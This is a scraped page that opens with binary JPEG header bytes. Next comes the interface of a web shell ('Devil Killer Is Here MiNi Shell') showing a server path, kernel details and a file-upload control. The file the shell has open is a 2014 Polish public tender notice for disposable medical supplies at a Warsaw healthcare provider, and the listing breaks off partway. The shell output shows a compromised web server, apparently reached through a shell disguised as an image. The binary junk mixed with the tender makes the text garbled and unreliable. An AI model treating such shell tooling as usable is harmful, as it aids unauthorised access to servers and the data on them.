JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140114/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140114/14728-N-2014.html

<p class="kh_header"><b>Warszawa: Sukcesywne dostawy materiałów medycznych jednorazowego użytku</b><br>
<b>Numer ogłoszenia: 14728 - 2014; data zamieszczenia: 14.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Warszawa Wola-Śródmieście , ul. E. Ciołka 11, 01-445 Warszawa, woj. mazowieckie, tel. 22 8360191, faks 22 8378127.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zozwola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy materiałów medycznych jednorazowego użytku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są sukcesywne dostawy strzykawek, igieł, wenflonów, cewników, rurek intubacyjnych, wzierników, szczoteczek do wymazów i innych materiałów medycznych jednorazowego użytku dla Samodzielnego Publicznego Zakładu Opieki Zdrowotnej Warszawa Wola - Śródmieście oraz podległych jej Przychodni na terenie Warszawy.
2. Zamówienie obejmuje dostawy według asortymentu i w ilościach wskazanych w formularzach cenowych od nr 6 do nr 15 stanowiących załączniki do SIWZ.
3. Wyszczególniony asortyment powinien posiadać najwyższe standardy jakościowe, oraz posiadać wszelkie dokumenty zezwalające na stosowanie w jednostkach służby zdrowia.
4. Zamówienia składane przez Zamawiającego będą wynikać z bieżących potrzeb, co jest równoważne z możliwością niezrealizowania przedmiotu umowy w ilościach i w zakresie wskazanym w formularzach cenowych.
5. Kody przedmiotu zamówienia: CPV 33140000-3; 33141200-2; 33194100-7, 33141220-8, 33141310-6, 33141320-9.
6. Zamawiający dopuszcza składania ofert częściowych z podziałem na poszczególne
formularze cenowe.
7. Wymagania stawiane wykonawcy:
a) Wykonawca gwarantuje, że dostarczone wyroby będą wysokiej jakości oraz że są dopuszczone do obrotu i używania na terenie Polski zgodnie z obowiązującymi przepisami prawa.
b) Wszystkie zaoferowane wyroby spełniają warunki określone w formularzach cenowych oraz niniejszym rozdziale.
c) Opakowanie danego materiału musi zawierać następujące informacje: nazwę producenta, nazwę produktu, ilość sztuk w danym opakowaniu/kartonie, numer serii, datę ważności.
d) Terminy ważności dostarczanych wyrobów nie mogą być krótsze niż co najmniej 12 miesięcy licząc od daty dostawy danego materiału.
e) Termin zapłaty za zrealizowane dostawy nastąpi w terminie 30 dni od dnia złożenia zamawiającemu prawidłowo wystawionej faktury VAT.
f) Wykonawca gwarantuje, że ceny jednostkowe, określone w formularzach cenowych nie
wzrosną przez okres trwania umowy.
g) Wykonawca zobowiązuje się dostarczyć zamawianą partię towaru własnym staraniem do Przychodni Zamawiającego ( wykaz placówek stanowi załącznik nr 17 do SIWZ) w ciągu 2 dni roboczych, w godz. 8:00 - 14:00 od poniedziałku do piątku od pisemnego/telefonicznego/mailowego zamówienia złożonego przez Pracownika Działu Administracyjnego.
h) Przedmioty dostawy powinny posiadać dokładny i czytelny opis przedmiotu zamówienia na opakowaniu oraz stosowne certyfikaty lub atesty dopuszczające ich stosowanie w służbie zdrowia zgodnie z polskim prawem oraz prawem Unii Europejskiej (powinny odpowiadać określonym normom lub specyfikacjom technicznym, posiadać aktualne świadectwo dopuszczenia do obrotu oferowanych środków wymagane prawem). Przedmioty dostawy zamieszczone w ofercie powinny być bezpieczne w użyciu dla pacjentów oraz dla personelu.
Oznakowanie dostarczonych wyrobów, instrukcje użytkowania, opis wyrobu, etykiety (oryginalne) muszą być sporządzone w języku polskim.
Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 16 do SIWZ.
8. Wzór umowy stanowiący załącznik nr 5 do specyfikacji istotnych warunków zamówienia jest integralną częścią niniejszej dokumentacji a zapisy w niej zawarte traktuje się jako warunki udzielenia zamówienia.
9. Zamawiający zastrzega sobie prawo zakupu mniejszych ilości towaru niż podane w Załącznikach (Formularzach cenowych od nr 6 do nr 15) w trybie i na zasadach określonych w art. 145 Pzp.
10. W trakcie realizacji umowy, Zamawiający zastrzega sobie prawo zmiany ilościowej dostarczanych artykułów w granicach wynagrodzenia za całość dostaw, po cenach jednostkowych nie wyższych niż podane w formularzu cenowym/formularzach cenowych* stanowiącym integralną część SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.12.00-2, 33.19.41.00-7, 33.14.12.20-8, 33.14.13.10-6, 33.14.13.20-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie opisuje , nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnienie tego warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie opisuje , nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnienie tego warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie opisuje , nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnienie tego warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie opisuje , nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnienie tego warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający nie opisuje , nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca potwierdza spełnienie tego warunku poprzez złożenie oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty,dopuszczające przedmiot zamówienia do obrotu (deklaracja zgodności producenta, certyfikat CE oraz wpis, zgłoszenie lub powiadomienie do rejestru wyrobów medycznych - o ile dotyczy) i produktów biobójczych lub Deklaracja Zgodności,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje wprowadzenie zmian do postanowień zawartej umowy w stosunku do treści oferty dotyczące:
1.zmiany terminu wykonania zamówienia tj. 
a) w przypadku niewykorzystania maksymalnej kwoty brutto umowy przewiduje się przedłużenie terminu realizacji przedmiotu umowy,
b) w przypadku wykorzystania maksymalnej kwoty brutto umowy uważa się, iż umowa przestaje obowiązywać,
2. zmian ilościowych w zapotrzebowaniach Zamawiającego dotyczących poszczególnych pozycji przedmiotu umowy (w tym przypadku zamawiający przewiduje możliwość zmian ilościowych w tych pozycjach pod warunkiem, że maksymalna wartość brutto zobowiązania Zamawiającego nie ulegnie zwiększeniu),
3	 zaistnieją okoliczności skutkujące koniecznością dokonania zmian, których nie można było przewidzieć w momencie zawierania umowy, a są one korzystne dla Zamawiającego, przy czym zmiany te nie mogą wpływać na wysokość wynagrodzenia należnego Wykonawcy.
4	jeżeli Wykonawca zmienił dane firmy (np. w wyniku przekształceń, przejęć i.t.p) możliwe jest sporządzenie aneksu do umowy zmieniającego dane firmy, 
5	w przypadku zmiany obowiązujących przepisów prawnych, mających zastosowanie przy udzielaniu zamówień publicznych, treść umowy będzie zmieniała się stosownie do wprowadzonych rozwiązań prawnych.
6	W przypadku zmiany sposobu konfekcjonowania przedmiotu zamówienia przez producenta, czego wykonawca nie mógł przewidzieć ( z odpowiednim przeliczeniem ilości). 

Wszelkie zmiany umowy mogą być dokonane wyłącznie w formie pisemnej pod rygorem  nieważności za zgodą Zamawiającego i Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozwola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPZOZ Warszawa Wola-Śródmieście , ul. Ciołka 11, Warszawa, Kancelaria, II pietro pokój 204..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2014 godzina 09:30, miejsce: SPZOZ Warszawa Wola-Śródmieście , ul. Ciołka 11, Warszawa, Kancelaria, III piętro pokój 306..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Igły i wenflony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Igła iniekcyjna jednorazowego użytku  0,5     1op=100szt.	75
Igła iniekcyjna jednorazowego użytku  0,6     1op=100szt.	40
Igła iniekcyjna jednorazowego użytku  0,7     1op=100szt.	130
Igła iniekcyjna jednorazowego użytku  0,8     1op=100szt.	210
Igła iniekcyjna jednorazowego użytku  0,9     1op=100szt.	90
Strzykawka  jednorazowego użytku  2 ml     1op= 100szt.	230
Strzykawka  jednorazowego użytku  5 ml     1op= 100szt.	150
Strzykawka  jednorazowego użytku  10 ml   1op= 100szt.	50
Strzykawka  jednorazowego użytku  20 ml   1op= 100szt.	15
Strzykawka typu Żaneta lub równoważna poj. 100 ml	330
Strzykawka  typu Żaneta lub równoważna poj. 50 ml	2
Kaniula dożylna typu venflon,rozmiar 0,8 -20 G  pakowane pojedynczo  kolor różowy	310
Kaniula dożylna typu venflon,rozmiar 0,8 -18 G  pakowane pojedynczo  kolor zielony	120
Kaniula dożylna typu venflon,rozmiar 0,8 -22 G  pakowane pojedynczo  kolor niebieski	290.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6, 33.14.12.20-8, 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 68</li>
<li>2. Jakość wyrobu - 32</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szpatułki, kieliszki...</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szpatułki   drewniane  niejałowe (op  100 szt.)	750 op
Kieliszki do leków jednorazowe plastikowe o pojemności 30 ml z podziałką ( op=75 szt.) 	25 op
Serwetka sterylna jednorazowa z fizeliny (rozmiar 45x75) 	320	szt.
Serwetka sterylna jednorazowa z fizeliny (rozmiar 45x45) 	1270	szt.
Staza (Opaska automatyczna)	40	szt.
Żel do EKG  a 500 g	20	szt.
Żel do USG   a 500 g	250	szt.
Żel do USG Aquasonic   a 1000 g	70	szt.
Żel do badań Holtera  a 250 g	12	szt.
Maseczka do sztucznego oddychania (z filtrem)	70	szt.
Jednorazowe pensety	55	szt.
Pasta typu Every lub równoważna (Holter)	15	szt.
Ochraniacze na obuwie    ( op. 50 par )	40	op
Pasta skrobiowa elektrodowa ze środkiem ściernym  do badań EEG 	30	szt.
Pasta przewodząco-klejąca do mocowania elektrod do EEG  z  Biofeedback	3	szt.
Aparat do przetoczeń płynów infuzyjnych (IS) jałowy	40	szt.
Rurki ustno-gardłowe dla dzieci i dorosłych	20	szt.
Rurka intubacyjna z mankietem niskociśnieniowym, rozmiar od 6 do 9 (a 10 szt.)  	3	op
Cewniki do pęcherza	50	szt.
Maseczka chirurgiczna z gumką na uszy 	750	szt.
Serweta sterylna  z centralnym otworem wym. 45 x 75 cm.	200	szt.
Serweta sterylna  z centralnym otworem wym. 45 x 45 cm.	560	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.19.41.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Tubusy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tubusy ( rurki )  sigmoidoskopowe jednorazowego użytku 250x20 mm, karton 100 szt.  do  zestawu rektoskopowego  RE 7000 firmy Heine	4	karton
Tubusy ( rurki ) anoskopowe jednorazowego użytku 85x20 mm, karton 100 szt.  do zestawu  anoskopowego ATE firmy Heine	4	karton.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szczoteczki, wzierniki , osłonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jednorazowe, sterylne  szczoteczki do wymazów cytologicznych wachlarz-miotełka     	500	szt.
Wziernik ginekologiczny jednorazowy sterylny typu Cusco  rozmiar XS ,S,M,L	720	szt.
Osłonki  na głowice USG transwaginalne, endowaginalne, suche, śr. 34 mm, pakowane pojedynczo w folię aluminiową  op=150 szt.	8	op
Cytofix  lub równoważny aerozolowy preparat do utrwalania pobranych na szkiełka mikroskopowe rozmazów biologicznych, przed ich późniejszą oceną.	8	szt.
Chusteczki bezalkoholowe do dezynfekcji głowic USG op=100 szt. 	20	szt.
Jednorazowy pakiet porodowy	4	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wzierniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wzierniki uszne jednorazowe średnica 2,5 mm dopasowane  do otoskopu Alpha+    Mini 3000    op. 1000 szt	2	op.
Jednorazowy zestaw sterylnych wzierników do badania ucha, nosa, gardła zapakowany w pojedyńczy pakiet foliowo-papierowy  op = 20 szt	2	op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Paski typu STERIPOINT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Paski typu STERIPOINT lub równoważne a 250 szt. 	op	195.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Papiery termoczułe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier termoczuły  z nadrukiem, plastikowa rolka   do aparatu  Ascard  A-4 112 x 25	szt.	840
Papier  termoczuły  z nadrukiem, plastikowa rolka do aparatu  EKG  E 300 / E 600 110 x 40	szt.	100
Papier do EKG (aparat Farum Schiller AT-6) 144x100x350	szt.	20
Papier termoczuły do videoprintera Mitsubishi  K-61 B	szt.	150
Papier do videoprintera (Sony Digital UPP 11HG)	szt.	10
Papier do KTG  UT 3000 A Goldway  111x100x115	bl.	3
Jednorazowe papierowe nakładki do podbródków stosowane do lamp szczelinowych , tonometrów itd.. op. 500 szt. 	op.	13.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Łyżeczki dermatologiczne, igły biopsyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łyżeczki dermatologiczne a 50	op	48
Igły biopsyjne  a50	op	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Rękawy papierowo - foliowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękaw papierowo-foliowy mały 50 x 200	rol.	12
Rękaw papierowo-foliowy mały 100 x 200	rol.	63
Rękaw papierowo-foliowy średni 150 x 200	rol.	44
